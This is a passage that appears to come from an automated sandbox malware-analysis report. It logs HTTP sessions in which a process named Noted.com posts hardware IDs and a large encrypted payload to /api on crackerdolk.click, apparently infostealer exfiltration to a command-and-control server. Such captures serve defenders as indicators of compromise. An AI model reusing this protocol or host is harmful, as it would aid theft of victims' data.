                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=WX4W87C9
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 20504
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:32 UTC15331OUTData Raw: 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                      Data Ascii: --WX4W87C9Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--WX4W87C9Content-Disposition: form-data; name="pid"3--WX4W87C9Content-Disposition: form-data; name="lid"jMw1IE--l3--WX4W87C9Content-Disposition
                                      2024-12-28 08:13:32 UTC5173OUTData Raw: 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00 00 00 00
                                      Data Ascii: un 4F([:7s~X`nO`i`u?
                                      2024-12-28 08:13:33 UTC1137INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=43d94kit5vme28ni5nvlpc9j3u; expires=Wed, 23 Apr 2025 02:00:11 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QwWm3TDCDXVCxzg%2BG0VrC9%2FPBRABeoTbTiMs7ML1gftQLpmjxSvbHwVvbTkLSh17ZRpBpQVM%2FZh8zBtlIwVyjfl%2FnwtASXWuRIp5loM6gXOnFxkbjJQlwll%2FhzCPAI6WtTklUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017756d6f7d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1953&rtt_var=741&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21457&delivery_rate=1468074&cwnd=195&unsent_bytes=0&cid=deab2470a1062f0c&ts=968&x=0"
                                      2024-12-28 08:13:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.549756104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:34 UTC282OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=WFZFUTULE9E3NLKXYA
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 5473
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:34 UTC5473OUTData Raw: 2d 2d 57 46 5a 46 55 54 55 4c 45 39 45 33 4e 4c 4b 58 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 57 46 5a 46 55 54 55 4c 45 39 45 33 4e 4c 4b 58 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 46 5a 46 55 54 55 4c 45 39 45 33 4e 4c 4b 58 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d
                                      Data Ascii: --WFZFUTULE9E3NLKXYAContent-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--WFZFUTULE9E3NLKXYAContent-Disposition: form-data; name="pid"1--WFZFUTULE9E3NLKXYAContent-Disposition: form-data; name="lid"jMw1IE--l3-
                                      2024-12-28 08:13:35 UTC1131INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:35 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=ioug8c0lh9e5vjhm9kho4sgffe; expires=Wed, 23 Apr 2025 02:00:14 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PDGif0Y15UWpaznyoIxVz9ooxnLywecr6W8Yqiz%2FH1hDmaJvQO7bJ2BHJlHW2Iwrp993o3wzgmCz3%2FxJbU4tiWPCG1AY7moEUomOuyYU4VImMyaMhANbY4yk4IuwVW%2BBseXESw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017851ec643e9-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1700&rtt_var=647&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2841&recv_bytes=6391&delivery_rate=1678160&cwnd=242&unsent_bytes=0&cid=1f7fe3adaf2eccfe&ts=783&x=0"
                                      2024-12-28 08:13:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.549762104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:36 UTC272OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=A5ITWVH5
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 1201
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:36 UTC1201OUTData Raw: 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                      Data Ascii: --A5ITWVH5Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--A5ITWVH5Content-Disposition: form-data; name="pid"1--A5ITWVH5Content-Disposition: form-data; name="lid"jMw1IE--l3--A5ITWVH5Content-Disposition
                                      2024-12-28 08:13:37 UTC1136INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:37 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=ppgc89qokcoglk8tbfqrtdsjou; expires=Wed, 23 Apr 2025 02:00:16 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDE7oApaNsDCWzbcaPOTd6%2F0FAxaNw92Hw2l7jp%2BR0Luz4Vh7Ls1oIpmm55XrPVCN29XuRsn68KsMMOHX%2BrnLz%2FI%2F3YRMmYUxqG%2BCOKhCMrkuDWvnHsZA8uuIpgp7iPppIH26w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017921acd8c0f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1886&rtt_var=757&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2109&delivery_rate=1399808&cwnd=223&unsent_bytes=0&cid=c9b613d5a64bd96f&ts=816&x=0"
                                      2024-12-28 08:13:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.549768104.21.80.14431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      TimestampBytes transferredDirectionData
                                      2024-12-28 08:13:39 UTC274OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=OZ3O7DI1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 574908
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                      Data Ascii: --OZ3O7DI1Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--OZ3O7DI1Content-Disposition: form-data; name="pid"1--OZ3O7DI1Content-Disposition: form-data; name="lid"jMw1IE--l3--OZ3O7DI1Content-Disposition
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: 4b 06 63 98 c2 a4 cf fa 93 f2 00 63 7b fc 3d de 9c 42 cb f2 d4 55 a7 18 ab 11 ce 99 e5 8b 52 67 d7 11 7c eb 49 89 fc 13 1b c1 8f b2 87 28 a7 e8 65 c6 e9 57 4a 69 05 1f ef d3 44 be 4e a9 b1 3b d5 f2 c3 d4 98 89 1f 23 34 2b 5b 03 18 06 ed ca 6f cf 39 eb 81 25 99 de dc ec c4 2b 7f ef 7f ff 41 24 4d 58 23 c5 db 10 eb af d3 93 ae e1 42 9a 44 1d 60 75 79 54 f2 8b 2a 9d d5 aa d9 6b d0 1a 34 5a 13 a4 74 db da 12 ca d1 43 a9 c9 ff 30 a8 45 3a b6 b8 78 ff e9 25 84 a3 15 42 63 97 f3 1e 9f fa 5b 97 eb 13 e3 75 2f f8 1d 29 db 15 fa 4b 6d 9e d4 19 73 4c b1 80 98 1a e6 5b 78 ce 45 80 3f 40 92 b4 76 63 34 21 95 7f 7b 3c 53 79 22 31 24 d2 6e 3d 2a e0 44 44 de a8 fe 69 41 5b 17 17 65 94 c1 2d 42 2f 7c 99 3b b2 34 13 0b c1 35 50 85 38 41 fb 3f b8 c8 03 98 b1 47 5e d9 5c 9b
                                      Data Ascii: Kcc{=BURg|I(eWJiDN;#4+[o9%+A$MX#BD`uyT*k4ZtC0E:x%Bc[u/)KmsL[xE?@vc4!{<Sy"1$n=*DDiA[e-B/|;45P8A?G^\
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: f7 3e c6 96 cd db b8 61 66 96 67 48 05 ba cc 09 b9 58 88 bb f3 eb 84 73 e6 46 de d9 ba f4 83 9d e5 7c e2 b2 4d 59 ec 42 4a 90 12 31 0d d5 89 7e da 20 ca 96 1e fa a8 7b 02 8e d7 1c b2 ec 8c 0f 1b 8c 5f 73 ae e4 85 cb b1 0a cd 37 65 8d 49 e6 14 cf 92 f8 64 8e f0 8f 73 2e 58 ba aa b0 4c bf 82 05 e3 e0 66 49 4d 62 8c d5 87 43 ab 3d d6 6c 84 79 d8 ca 0d 7a 5d 36 ee 4d 54 59 10 95 44 91 be ee 98 82 1e 47 45 83 20 7f bc d8 d8 17 d1 84 7d ea 89 27 de 2a a7 2f 63 5f fb 15 5b 49 9c 3f c2 ee a8 44 cd cf 91 1b 63 94 bd 08 6b 77 a8 15 a8 80 42 aa 11 37 55 23 8d 25 62 72 22 9d 61 b5 e8 22 d4 41 da 59 20 ea 7a bb c3 e3 2f c2 63 65 06 f5 cd f7 c1 4e 86 39 f3 cf f4 43 54 d9 c9 a5 a5 87 c5 29 1e 0e 7b d3 4a e1 94 b0 10 cb 28 a5 ec 2e bf 85 c7 12 d2 63 86 b6 0d a2 b3 09 38
                                      Data Ascii: >afgHXsF|MYBJ1~ {_s7eIds.XLfIMbC=lyz]6MTYDGE }'*/c_[I?DckwB7U#%br"a"AY z/ceN9CT){J(.c8
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: d3 52 32 12 00 9d 8f 5d f9 82 3f b0 63 03 04 78 65 4d 52 ff 38 10 f2 0e 91 ca d0 92 60 86 11 6a 25 b3 9f d7 e1 65 11 0b 83 b2 9d 34 81 8d 4e 61 dc 35 95 84 e0 d5 bb 2d 36 43 91 e8 a8 99 5d 0a 6d aa 55 87 7b 3d 3c d8 d3 4a 81 c8 e7 f8 cb 56 e9 b1 dd 62 0e 22 c0 c6 35 b3 7d 81 fd b7 54 e2 f7 16 c3 f0 96 45 c6 ca a8 28 ce 9f eb b0 8e 60 29 2c cc 6a 39 34 55 d0 7f 0e ac fa 2e 62 ca b7 53 0e 2a dd f7 22 06 b7 47 7d ba fc ab fe 08 d0 9d 8d 7f 4a 5d df 34 96 7b ff a1 63 4f fc ab af a5 37 86 86 58 3f 86 57 94 be a7 87 f8 22 2e 7d af aa 27 9a bb d5 98 2c 7a 34 4d d0 45 c3 12 39 8c 3f 67 58 88 90 24 e2 c7 87 6b 98 8e 1b 8a 4b 55 1b 9f cb b0 3d ae bd 5a 3b 88 f2 ac f1 c8 e5 38 4e 5f 4c e4 38 a9 e3 e3 49 d7 36 8a 49 24 05 c7 e6 28 d4 56 09 be 0d 9d 7f d4 4d a7 b5 9e
                                      Data Ascii: R2]?cxeMR8`j%e4Na5-6C]mU{=<JVb"5}TE(`),j94U.bS*"G}J]4{cO7X?W".}',z4ME9?gX$kKU=Z;8N_L8I6I$(VM
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: 24 c0 eb 5d 6f f1 d4 54 a1 73 b4 74 30 0c ce 07 f4 ae 9b c9 29 1d ed cb 82 80 38 e8 c5 be 99 b7 2f 36 4e d1 7b 91 8f e6 be 14 6f 80 d2 de 99 ff 91 8f b0 55 c0 7e 2d 11 81 07 b7 12 a9 c9 3e 34 83 95 76 03 94 24 fe 6a 26 0a 6f 3b 14 7e 01 5f 57 ea 5a 8e 59 3b 48 56 f1 40 fe dc 3f 35 89 13 60 be 98 4d ae f3 17 1f 3b a5 10 59 66 59 2c 9d 92 8c 1c 47 31 d9 17 5b d5 ee 2f 8a 09 62 24 5e ba e3 3b 44 da 88 8c ee 13 ee d5 e9 f3 b9 5a 40 1d 9c 4d 75 cd 93 69 58 7c 65 9b 78 e3 4f eb 70 b7 f8 0c fe bc f7 55 95 0c dd 90 c8 df f1 3d 97 69 99 e5 68 7e d1 8b 0f 6f 6e 5d 6c 43 36 c8 2d 84 5a d4 b8 dd fb eb 20 fd c5 3b d1 22 9e 6f c9 3c 2d 36 5c 00 21 8b c2 30 eb 4d ee 99 4f 36 d5 10 33 42 ca 94 fc 07 e5 f6 5e 84 f3 74 97 4f 93 63 18 e4 2b 85 3b d0 f1 67 2d 95 6c a9 88 b9
                                      Data Ascii: $]oTst0)8/6N{oU~->4v$j&o;~_WZY;HV@?5`M;YfY,G1[/b$^;DZ@MuiX|exOpU=ih~on]lC6-Z ;"o<-6\!0MO63B^tOc+;g-l
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: 9f be 88 8f e9 74 2a 63 f9 09 11 fb 23 92 b5 dc e4 61 25 29 b7 31 ee 41 ed 1c 75 53 c3 91 31 00 6e 8d 2a a6 2b a6 0d f1 21 46 20 ab 50 0b 44 f3 02 25 40 da 6a c9 a6 6e 25 9a 8b 00 81 52 6e 89 7a 6c 94 1e 4c 95 f4 a4 fe f6 6d 6b 46 00 1a 48 fa 97 16 d2 f6 84 b6 0b cc 23 ac e9 5f a9 79 af 7f a4 e6 3d 00 fc ee eb 27 eb 06 86 2a 4f d1 25 c2 14 80 9e a2 de 0b a5 77 1e e9 6a 56 05 ba c8 ba 96 04 f9 16 9d f2 16 1b d2 e1 07 84 8e ef 68 10 de 55 88 2e 3e f1 4a 00 57 f2 09 f5 d1 fc 48 d1 dc 9b 1b 9f a0 c1 db 04 42 8d 11 92 84 b5 84 c1 aa 2c 47 50 14 08 7d 81 fe 67 e9 75 ab 81 22 b2 d7 1b 88 71 ca 61 bb ed e0 14 1e 11 76 aa fb 45 78 69 d5 fb 45 28 64 f2 3b 0f 21 a6 1f 20 93 11 44 e8 c9 9f 8f 85 27 99 67 2d 12 75 b2 35 fc 4e ad c5 5e db fa a3 87 2e d0 09 9a 7d ac 96
                                      Data Ascii: t*c#a%)1AuS1n*+!F PD%@jn%RnzlLmkFH#_y='*O%wjVhU.>JWHB,GP}gu"qavExiE(d;! D'g-u5N^.}
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: c8 a2 c7 4e 76 72 7f 0f 50 be cc cd a5 16 29 e1 02 85 f5 e6 bb 1c e7 1f 31 18 3d c1 73 0b 22 94 e3 77 ed 9a aa df af 3a d7 18 c7 81 9f 71 f5 2a 87 e8 c4 fe 70 10 72 76 18 75 65 59 72 de 2a d6 a8 1d 21 f0 78 e6 da e7 75 d6 df 41 78 a4 f4 77 47 50 6d dd b0 ce fa 52 5f 00 da 77 6b bc ee ac 5b 92 0d 33 7d a6 aa 73 5f 4c b0 e7 66 c7 a7 08 d5 5d b4 2f 79 0b b3 06 15 0d 56 bd 61 5a ef ab 26 4e 90 fb 94 65 4e 10 6c cf e6 4b 9e c1 83 97 c8 27 f2 6e d0 ca 3b 4a 0d e4 dc 1f e7 ea b9 9f be 90 76 49 6c 66 a0 c2 40 df 9b 49 5e 96 a4 72 c6 cc 22 a8 a4 ad 8a a0 b6 b9 b4 8d 2f 59 9c fe cf db 8d d5 ef 29 fd d7 2b 0f 55 7e 90 18 0c 6b c4 b3 87 7a 3e 7f dd 4a ac a9 92 cc bb dd e2 02 ba 7f ac 90 36 0b 58 73 29 35 d9 61 e8 1c c3 ac 95 7e 75 c0 f4 d3 c5 2e 01 e6 b6 f9 24 04 3e
                                      Data Ascii: NvrP)1=s"w:q*prvueYr*!xuAxwGPmR_wk[3}s_Lf]/yVaZ&NeNlK'n;JvIlf@I^r"/Y)+U~kz>J6Xs)5a~u.$>
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: 5c 91 09 a4 7e f6 d4 ba 93 d1 ae d1 f0 70 71 eb d6 2d 23 54 2b ce fa fd 1f 57 d9 95 1f 3b 85 74 c1 77 5d 5d c1 3f c2 84 17 cc 0c 58 16 a8 7d 03 91 62 b3 c2 d4 cb 01 1c a6 b4 36 fd ef 2d a5 af aa b7 56 a3 15 19 f7 36 49 66 d3 a9 ef 49 a2 1e 7b 47 68 07 c6 34 98 a3 ed b3 2b 8f ff 1a 5f b4 06 0f d4 76 98 97 f1 4f 8a c0 f2 13 c6 13 e5 4b 3b 37 8c 93 b9 11 4e 43 fa 0e a6 9c ba c8 92 f5 f0 0f 8b f5 6f d8 35 5e 5b ac 9a 8f b6 bf 73 17 3c 15 73 a2 9d 19 37 58 c6 b7 c2 ea 7a d9 59 c2 bb 95 67 87 e6 1c 5d 44 56 2c d6 d9 73 ef 0d 71 68 f4 5c 0b 7f df 5e 30 77 b4 2e 9a 73 fd 95 b5 20 21 8c 0a fa 3e 09 9f 57 88 54 c7 65 24 e2 5e 87 60 b4 af 96 0b a1 df 2b b8 30 bb 4a 20 d6 14 06 27 a3 d2 9c 28 58 32 24 4b 21 e4 35 55 1e 2c 99 2a 47 09 7e 91 a6 a6 30 7c d7 d9 f4 ab 49
                                      Data Ascii: \~pq-#T+W;tw]]?X}b6-V6IfI{Gh4+_vOK;7NCo5^[s<s7XzYg]DV,sqh\^0w.s !>WTe$^`+0J '(X2$K!5U,*G~0|I
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: 26 37 99 75 60 78 68 1e 73 2d 73 31 a1 3f 1a 5f a2 2c 7d 9d a2 b0 ca 5d 79 9c f6 b6 07 e5 c0 fb 8c 02 5f 96 73 71 50 6e e9 eb 44 20 31 ad be 34 71 b4 f7 cb ee 0c 7d 78 14 cf 50 9a da 12 be 1e 36 d2 e3 87 d5 1e af 0d 86 06 7c 07 07 0a fd 1b 0e a8 f8 7d b0 f0 8b 2d ad 15 92 fa fd 99 6c 4c cd eb ff db e8 a2 20 6c 40 3c 4d fe 5b b2 30 87 a7 0a 42 45 c1 d4 25 e2 35 d5 02 05 5c 91 ce 15 dd 17 07 46 b9 ba d5 14 47 93 63 95 f1 0f f3 9a 06 d8 fa 41 52 4c d9 5b af f9 c2 18 f4 a7 ae 96 9a 57 78 e6 f1 d1 ea 13 3e 14 84 16 a4 bf df 07 d3 11 00 37 6e 1c 9c 0d 3f a6 04 02 66 c5 d3 fe 9b cd 75 63 2f 74 7f 06 a4 95 73 5f fc 49 fe 73 49 b4 1c b2 ff e7 60 5b 7e 71 03 b1 db 7e 08 19 90 cc bc 0c 44 24 53 48 d5 6c 4d f0 04 55 fa 02 1d 17 c4 b1 96 80 aa 78 39 da d4 3a f2 29 0b
                                      Data Ascii: &7u`xhs-s1?_,}]y_sqPnD 14q}xP6|}-lL l@<M[0BE%5\FGcARL[Wx>7n?fuc/ts_IsI`[~q~D$SHlMUx9:)
                                      2024-12-28 08:13:39 UTC15331OUTData Raw: de 84 22 c6 e6 91 ac 80 18 c3 3e 18 df 06 01 73 c5 74 f1 e2 83 af e0 36 09 90 3c 71 78 5c 1f d0 e8 b9 34 51 8a f7 a7 d8 ac 2e 93 e0 8f 2e 77 ae c1 a3 e1 be fd ff a1 9c 25 70 10 31 80 a1 8e 7c c4 77 0d c2 5c 34 b9 23 f2 40 2f 3f 5d c3 c4 43 b9 62 15 ae 0a 5d eb 90 fd 32 d2 54 63 db b0 3d 81 9c 91 3c aa 4f 4e 4e f0 1f ce 87 6d 35 36 30 ad 01 39 a1 ce 8a 1d 73 a4 61 b3 e7 35 c1 d3 ce 34 52 c7 ee 07 0d e3 ec f2 7d 94 2a 70 2e e9 67 9a 5b fa 08 32 6c 64 97 71 d9 ce 28 89 99 57 9b b3 ba c7 a5 0f 44 9e 38 92 ba 01 61 73 75 7e 0b e2 d4 b4 57 26 e5 a0 8b 2a de ad 3e ef 2a b2 5c e0 b0 1a 7e 1e 40 ed 03 ac eb 2d 25 54 b6 a5 a8 be 52 6a e0 77 df 5a 2d 60 b0 f4 96 bd 3c 3d 7d c7 a1 d6 b9 6e ac 5b f4 a9 32 99 b6 8a c8 4a 29 a9 2a 54 c8 f2 a1 ad c8 b7 f5 cf c6 8f 9c 11
                                      Data Ascii: ">st6<qx\4Q..w%p1|w\4#@/?]Cb]2Tc=<ONNm5609sa54R}*p.g[2ldq(WD8asu~W&*>*\~@-%TRjwZ-`<=}n[2J)*T
                                      2024-12-28 08:13:41 UTC1143INHTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:41 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=qh4bks215hb3s4ankl2dapmgrp; expires=Wed, 23 Apr 2025 02:00:20 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
